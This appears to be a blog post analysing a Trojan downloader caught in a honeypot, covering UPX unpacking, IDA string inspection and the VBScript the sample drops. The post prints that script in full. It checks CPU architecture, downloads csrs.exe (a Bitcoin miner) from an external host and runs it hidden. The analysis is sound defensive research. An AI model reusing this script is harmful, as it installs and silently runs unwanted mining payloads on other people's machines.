Skip to main content

Analysis: Trojan.Downloader.6d1d946fc8a3ea0610bdef966bcd3a0e452278f0584f4058ca593d03c22dbe4c

An analysis of a Trojan Downloader I came across in one of my honeypots.

A quick analysis of the file using ProtectionID shows the file is packed with UPX, so lets unpack it quickly using the -d flag which UPX provides.

                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2017
UPX 3.94w       Markus Oberhumer, Laszlo Molnar & John Reiser   May 12th 2017

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     69632 <-     36352   52.21%    win32/pe     downloader.exe

Unpacked 1 file.

Let check the file again in ProtectionID and see what it finds.

File Type : 32-Bit Exe (Subsystem : Win GUI / 2), Size : 69632 (011000h) Byte(s) | Machine: 0x14C (I386)
Compilation TimeStamp : 0x588079E7 -> Thu 19th Jan 2017 08:33:43 (GMT)
[TimeStamp] 0x588079E7 -> Thu 19th Jan 2017 08:33:43 (GMT) | PE Header | - | Offset: 0x00000088 | VA: 0x00400088 | -
[File Heuristics] -> Flag #1 : 00000000000000001100000000000000 (0x0000C000)
[Entrypoint Section Entropy] : 5.20 (section #0) ".code   " | Size : 0x3063 (12387) byte(s)
[DllCharacteristics] -> Flag : (0x0000) -> NONE
[SectionCount] 5 (0x5) | ImageSize 0x15000 (86016) byte(s)
[ModuleReport] [IAT] Modules -> KERNEL32.DLL | COMCTL32.DLL | GDI32.DLL | MSVCRT.dll | OLE32.DLL | SHELL32.DLL | SHLWAPI.DLL | USER32.DLL | WINMM.DLL
[CompilerDetect] -> PureBASIC
[!] File appears to have no protection or is using an unknown protection
- Scan Took : 0.140 Second(s) [00000008Ch (140) tick(s)] [506 of 580 scan(s) done]

A pretty unusual sample, in the sense that it has been coded in PureBasic.
The good news is that there is no more obvious protection around the sample!

Using IDA, a quick survey of what imports and strings are used reveal a few interesting things.
1. .data:00412025 00000005 C .vbs
2. 004126C8 CreateFileA KERNEL32
3. 004126D0 WriteFile KERNEL32

The above 3 things are interesting given that .vbs references a VBScript file and there are no networking functions in the imports itself – so it stands to reason that there is a script that will be written and executed at some point during the execution of the sample.

Lets focus on this idea, since it is possible that the the .vbs file could be a major part of the infection process.


After a little bit of debugging I was able to extract the following VBScript file which the sample wrote to the %temp% folder: 0018FF78 01C15910 "C:\\Users\\MW\\AppData\\Local\\Temp\\CD84.tmp\\CD85.vbs".

The VBScript contains the following code:

Option Explicit
Const ForReading = 1
Const ForWriting = 2
Dim ObjWMI, ColSettings, ObjProcessor,cpuminer,videocardminer,WshShell,objStdOut, cpucount
Dim StrComputer, ObjNetwork, objFSO, objWMIService, architectura, proccores, gram,gpu, objItem, lool

Set objStdOut = WScript.StdOut
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")

Set ObjNetwork = WScript.CreateObject("WScript.Network")
StrComputer = Trim(ObjNetwork.ComputerName)
Set ObjNetwork = Nothing
Set ObjWMI = GetObject("WINMGMTS:" & "{ImpersonationLevel=Impersonate,AuthenticationLevel=Pkt}!\\" & StrComputer & "\Root\CIMV2")
Set ColSettings = ObjWMI.ExecQuery ("SELECT * FROM Win32_Processor")
Set WshShell = WScript.CreateObject("WScript.Shell")
cpuminer = false
architectura = 0
videocardminer = false
For Each ObjProcessor In ColSettings
    If ObjProcessor.ProcessorType = 3 OR ObjProcessor.ProcessorType = 2 Then
        cpuminer = true
        proccores = ObjProcessor.NumberOfLogicalProcessors
        videocardminer = false
    End If
    If ObjProcessor.ProcessorType = 4 OR ObjProcessor.ProcessorType = 6 Then
        cpuminer = false
        videocardminer = true
    End If
    If ObjProcessor.Architecture = 0 AND ObjProcessor.AddressWidth = 32 Then
        architectura=32
    End If
    If (ObjProcessor.Architecture = 6 OR ObjProcessor.Architecture = 9) AND ObjProcessor.DataWidth = 64 AND ObjProcessor.AddressWidth = 32 Then
        architectura=32
    End If
    If (ObjProcessor.Architecture = 6 OR ObjProcessor.Architecture = 9) AND ObjProcessor.DataWidth = 64 AND ObjProcessor.AddressWidth = 64 Then
        architectura=64
    End If
Next
Sub HTTPDownload( myURL, myPath )
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", myURL, False
    xHttp.Send

    with bStrm
        .type = 1 '//binary
        .open
        .write xHttp.responseBody
        .savetofile myPath, 2 '//overwrite
    end with
End Sub



Set ObjProcessor = Nothing: Set ColSettings = Nothing:  Set ObjWMI = Nothing:   StrComputer = vbNullstring

If architectura=64 Then 
        HTTPDownload "http://v91049e6.beget.tech/[email protected]/6/csrs.exe","./csrs.exe"
End if

If architectura=32 Then 
        HTTPDownload "http://v91049e6.beget.tech/[email protected]/3/csrs.exe","./csrs.exe"
End if

WshShell.Run "csrs.exe", 0

Quite obviously, the script downloads a variation of a file named csrs.exe and executes the downloaded file. One version if the system architecture is 32-bit and the other if it is 64-bit.

The downloaded file is a BitcoinMiner, but I am not going to go into that in this post.

References

Sample SHA-256: 6d1d946fc8a3ea0610bdef966bcd3a0e452278f0584f4058ca593d03c22dbe4c

Tools

  1. x64Dbg – http://x64dbg.com/
  2. VirusTotal – https://virustotal.com
  3. ProtectionID – https://pid.gamecopyworld.com/
  4. Yara – https://virustotal.github.io/yara/
  5. Hex-Rays IDA-Pro

Virus Total

Sample Analysis:
https://virustotal.com/en/file/6d1d946fc8a3ea0610bdef966bcd3a0e452278f0584f4058ca593d03c22dbe4c/analysis/

CSRS.exe Analysis:
https://virustotal.com/en/file/330174725c331dcb9e75aaf4aeeefd5ec97fb04f01630afa6dc3282e34acc2e8/analysis/